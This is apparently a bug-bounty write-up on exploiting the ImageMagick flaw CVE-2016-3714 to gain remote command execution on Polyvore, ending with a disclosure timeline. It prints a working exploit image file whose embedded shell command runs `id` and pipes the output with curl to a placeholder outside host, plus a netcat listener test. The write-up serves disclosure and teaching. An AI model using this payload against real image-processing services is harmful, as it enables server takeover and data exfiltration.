Exploiting ImageMagick to get RCE on Polyvore (Yahoo Acquisition)

On 5/5/2016 ImageMagick was assigned CVE-2016-3714 “ImageMagick Delegate Arbitrary Command Execution”. Now let’s dig to this vulnerability and how to exploit this.  Having ImageMagick locally installed is advised in order to validate the POC (but not required). For this particular report, I created a file named  exploit.png with the following in the “source code” to get the target’s `id`:





$ cat exploit.png
push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://127.0.0.1/x.php?x=`id | curl http://SOMEIPADDRESS:8080/ -d @- > /dev/null`'
pop graphic-context




Now quick check with ImageMagick to make sure our POC is working we'll have nc listening on 8080 and convert x.png to a test file :


$ convert x.png test.png
 % Total % Received % Xferd Average Speed Time Time Time Current
 Dload Upload Total Spent Left Speed
100 347 0 0 100 347 0 37 0:00:09 0:00:09 --:--:-- 0
[...]



Yahoo_RCE_Test1

Alright! We got a working POC. Now let's try and find target for this and talk about Yahoo! The process should be pretty easy, find an image uploader (i.e. profile images) and upload the exploit.png file and see what happens. Lucky for me, Polyvore was recently acquired and added to the Yahoo Bug Bounty scope where I remember there was an profile image  function from previous testing. Uploading a exploit.png onto Polyvore as my profile image resulted in:


Yahoo_RCE


 


Timeline:


5/4/2016  14:15 - Vulnerability Discovered


5/4/2016 14:35 - Triaged


5/4/2016 15:50 - Fixed


 


 

Post a comment

You may use the following HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>